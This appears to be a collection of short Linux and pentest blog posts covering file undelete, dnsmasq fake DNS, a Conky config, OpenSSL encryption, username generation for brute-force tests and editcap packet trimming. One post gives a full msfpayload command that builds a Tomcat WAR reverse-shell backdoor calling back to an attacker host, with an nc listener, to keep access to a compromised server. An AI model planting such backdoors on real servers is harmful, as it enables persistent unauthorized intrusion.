Undelete files on ext4 filesystem.

Use extundelete 0.2.4 version.

DESCRIPTION
       extundelete is a utility that can recover deleted files from an ext3 or ext4 partition
       extundelete uses the information stored in the partition's journal to attempt to recover a file that has been deleted from the partition.
       There is no guarantee that any particular file will be able to be undeleted, so always try to have a good backup system in place, or at least put one in place after recovering your files!

extundelete --restore-all

Kali ships with old version wich is not working in some cases!

Easy setting fake DNS for testing purposes

This post about how to set up fake DNS on Kali Linux, which can help when remotely testing resources which are not available in public DNS. Of course first thought is to add record in /etc/hosts file. But it is not enough, because most tools still use DNS resulotion to determine target and will fail if you use just /etc/hosts file.

For this purpose we will use "dnsmasq" utility.

We just need to create /etc/dnsmasq.conf file (if not created already) and add specfic DNS record:

After we just need to change /etc/resolv.conf to use localhost as DNS server.

P.S. If you need to leave DNS resoving for other sites too, so you need to add different "resolv-file" in /etc/dnsmasq.conf. Syntaxis is:
resolv-file=/etc/resolv.conf.localhost (or any other file).

Apache Tomcat WAR backdoor using msfpayload

If you already had compromised Apache Tomcat web server it is useful to leave backdoor for later access.

You can use msfpayload for this:

Screenshot is really smal so this is the command:
#msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 W > reverse_tcp.war


We created WAR, which will connect to LHOST:LPORT and open basic linux shell. So youl need listener from you side. You can use "nc -lvp 4444" for this purpose.

To use backdoor you need to know JSP file name. You can find it extracting files from WAR:

In this tutorial I assume you already has access to Tomcat manager and you know how to upload WAR. So after you uploaded it you can simply call backdoor at any time accessing:

http://:/reverse_tcp/xsltvorkye.jsp

And thats it! :)

My Conky config file

Code of conky.rc
-------------------------------------------------------------------------
background no
font Snap.se:size=8
xftfont Snap.se:size=8
use_xft yes
xftalpha 0.1
update_interval 1.0
total_run_times 0
own_window yes
own_window_type transparent
own_window_transparent yes
own_window_hints undecorated,below,sticky,skip_taskbar,skip_pager
double_buffer yes
draw_shades no
draw_outline no
draw_borders no
draw_graph_borders no
minimum_size 206 5
maximum_width 206
default_color dddddd
default_shade_color 000000
default_outline_color 000000
alignment top_right
gap_x 6
gap_y 22
no_buffers yes
cpu_avg_samples 2
override_utf8_locale no
uppercase no # set to yes if you want all text to be in uppercase
use_spacer left

TEXT
${font LCD:style=Bold:pixelsize=56}${alignc}${time %H:%M}${font Snap.se:size=8}

${font Aerial:style=Bold:pixelsize=12}SYSTEM${font Snap.se:size=8} ${hr 1 }

Hostname: $alignr$nodename
Kernel: $alignr$kernel
Uptime: $alignr$uptime
Processes: ${alignr}$processes ($running_processes running)
Load: ${alignr}$loadavg

Battery    ${battery_time BAT0} ${alignr}(${battery BAT0})
${battery_bar 4 BAT0}

CPU       ${alignc} ${freq}MHz / ${acpitemp}C ${alignr}(${cpu cpu1}%)
${cpu cpu1}%${cpubar 4 cpu1}
${cpu cpu2}%${cpubar 4 cpu2}
${cpu cpu3}%${cpubar 4 cpu3}
${cpu cpu4}%${cpubar 4 cpu4}
${cpugraph cccccc ffffff}

RAM ${alignr}$mem / $memmax ($memperc%)
${membar 4}

SWAP ${alignr}$swap / $swapmax ($swapperc%)
${swapbar 4}

Highest CPU $alignr CPU% MEM%
${hr 1}
${top name 1}$alignr${top cpu 1}${top mem 1}
${top name 2}$alignr${top cpu 2}${top mem 2}
${top name 3}$alignr${top cpu 3}${top mem 3}

Highest MEM $alignr CPU% MEM%
${hr 1}
${top_mem name 1}$alignr${top_mem cpu 1}${top_mem mem 1}
${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2}
${top_mem name 3}$alignr${top_mem cpu 3}${top_mem mem 3}



${font Aerial:style=Bold:pixelsize=12}FILESYSTEM ${font Snap.se:size=8}${hr 1}

Root: ${alignr}${fs_free /} / ${fs_size /}
${fs_bar 4 /}
-------------------------------------------------------------------------------------------

How to use it can be really easy found using Google. 

Encrypting and decrypting files using OpenSSL

If you need to just encrypt file without additional tool on Linux box, you can use OpenSSL for this task. It may help you sent sensitive information trough unsecure channels.

You can use varios encryption algorithms ( I'm using AES 128 in this example): 

root@vo:~# cat test.txt
test test test
root@vo:~# openssl enc -aes-128-cbc -in test.txt -out test.txt.enc 
enter aes-128-cbc encryption password: 
Verifying - enter aes-128-cbc encryption password: 
root@vo:~# rm test.txt

 And after use "-d" option for decrypting:

root@vo:~# openssl enc -d -aes-128-cbc -in test.txt.enc -out test.txt 
enter aes-128-cbc decryption password: 
root@vo:~# cat test.txt 
test test test 

 And thats all :)

shell script: generate usernames from information found

Almost in every penetration test auditor encounter some of this information - company worker names and e-mail addresses. And after use them to launch Brute-Force or other attacks. Of course this information needs to be somehow translated to valid username format

Here is my basic script, which generates "usernames" from text file, that contains user data in following formats:

1) Name Surname

2) Surname Name

3) username@domain

4) name.surname@domain

It generates usernames using this formats:

1) first letter of name + surname

2) first letter of surname + name

3) last letter of username + rest of username

4) rest of username + first letter of username

5) All of this trimmed to 8 characters

I have plan to add to this script functionality to add number at the end of username like ajons01 or ajons1, ehich are used when there are two workers with same letter combination.

Syntaxis for this script is:

 ./create_username.sh input.txt output.txt

And here is link to this script:

https://docs.google.com/file/d/0Byb0uBS7ecMzTGhmUTJERVJsc00/edit?usp=sharing

Here sample output from how it works:

Wireshark: Packet capture file - leave only headers

There is times, when you need to send packet capture files to "some support" but you are unsure if they contains sensitive information. If you are happy to send them just packet headers (in some cases you cannot do this, if problem is at application level), there is command line
tool which go with wireshark which can help you:

editcap -s 52  infile.cap outfile.cap

What it does: it chos everything after 52 bytes from packet. 52 bytes is enough to capture L2/L3/L4 headers.

After this operation packets in file will be like this:

And at the end you will see - Packet size limited during capture.

This method is usefull when debugging communication problems, which is not related to Application layer.

You can check additional options of editcap, using editcap -h: